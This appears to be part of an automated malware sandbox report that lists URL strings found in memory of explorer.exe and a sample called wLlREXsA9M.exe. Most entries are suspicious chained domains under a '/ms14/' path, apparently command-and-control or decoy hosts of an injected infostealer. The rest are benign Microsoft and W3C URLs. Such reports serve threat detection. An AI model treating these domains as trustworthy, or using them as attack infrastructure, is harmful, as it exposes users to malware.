Source: explorer.exe, 00000004.00000003.2618208073.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2599670367.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2633107162.0000000010FA4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5878013730.0000000010F82000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.o;
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aniwatch.top
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aniwatch.top/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aniwatch.top/ms14/www.genqaagz.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aniwatch.top/ms14/www.jroxtqpq.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aniwatch.topReferer:
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aqeabrdm.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aqeabrdm.cfd/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aqeabrdm.cfd/ms14/www.cacciatoridiofferte.com
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aqeabrdm.cfdReferer:
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cacciatoridiofferte.com
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cacciatoridiofferte.com/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cacciatoridiofferte.com/ms14/www.qhrxnxoe.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cacciatoridiofferte.comReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.civzbpp.xyz
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.civzbpp.xyz/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.civzbpp.xyz/ms14/www.lojaasoriginais.online
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.civzbpp.xyzReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.clasmiv.xyz
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.clasmiv.xyz/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.clasmiv.xyz/ms14/www.duffledash.com
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.clasmiv.xyzReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duffledash.com
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duffledash.com/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duffledash.com/ms14/(
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duffledash.comReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.genqaagz.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.genqaagz.cfd/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.genqaagz.cfd/ms14/www.clasmiv.xyz
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.genqaagz.cfdReferer:
Source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000626000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jroxtqpq.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jroxtqpq.cfd/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jroxtqpq.cfd/ms14/www.tchyhg.com
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jroxtqpq.cfdReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasik-de-de-8808230.zone
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasik-de-de-8808230.zone/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasik-de-de-8808230.zone/ms14/www.qhrxnxoe.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasik-de-de-8808230.zoneReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lilith-con.com
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lilith-con.com/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lilith-con.com/ms14/www.civzbpp.xyz
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lilith-con.comReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lojaasoriginais.online
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lojaasoriginais.online/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lojaasoriginais.online/ms14/www.aniwatch.top
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lojaasoriginais.onlineReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihil.one
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihil.one/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihil.one/ms14/www.wshaizapp.site
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nihil.oneReferer:
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterscanner.com
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterscanner.com/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterscanner.com/ms14/www.pgtjirqx.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterscanner.comReferer:
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pgtjirqx.cfd
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pgtjirqx.cfd/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pgtjirqx.cfd/ms14/www.aniwatch.top
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pgtjirqx.cfdReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qhrxnxoe.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qhrxnxoe.cfd/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qhrxnxoe.cfd/ms14/www.peterscanner.com
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qhrxnxoe.cfd/ms14/www.sxbhpysr.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qhrxnxoe.cfdReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qwevqgjw.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qwevqgjw.cfd/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qwevqgjw.cfd/ms14/www.lasik-de-de-8808230.zone
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qwevqgjw.cfdReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sxbhpysr.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sxbhpysr.cfd/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sxbhpysr.cfd/ms14/www.venria.store
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sxbhpysr.cfdReferer:
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tchyhg.com
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tchyhg.com/ms14/
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tchyhg.com/ms14/www.wshaizapp.site
Source: explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tchyhg.comReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venria.store
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venria.store/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venria.store/ms14/www.zbjcolwy.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venria.storeReferer:
Source: wLlREXsA9M.exe, 00000003.00000001.908308746.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: wLlREXsA9M.exe, 00000003.00000001.908308746.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wshaizapp.site
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wshaizapp.site/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wshaizapp.site/ms14/www.lilith-con.com
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wshaizapp.siteReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ypasbfxplu.shop
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ypasbfxplu.shop/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ypasbfxplu.shop/ms14/www.nihil.one
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ypasbfxplu.shopReferer:
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbjcolwy.cfd
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbjcolwy.cfd/ms14/
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbjcolwy.cfd/ms14/www.ypasbfxplu.shop
Source: explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbjcolwy.cfdReferer:
Source: explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000004.00000002.5857150402.000000000930B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2623397647.000000000930D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.996144169.000000000930B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm~
Source: explorer.exe, 00000004.00000003.2597061412.000000000D17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1623040856.000000000D17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000D17B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000002.5851910517.0000000004F5B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.990645463.0000000004F5B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/n
Source: explorer.exe, 00000004.00000002.5856654967.0000000009272000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0013712877CD4FA3A5007AAAB9D108D2&timeOut=5000&oc
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.986723975.0000000002DBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5847493003.0000000002DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
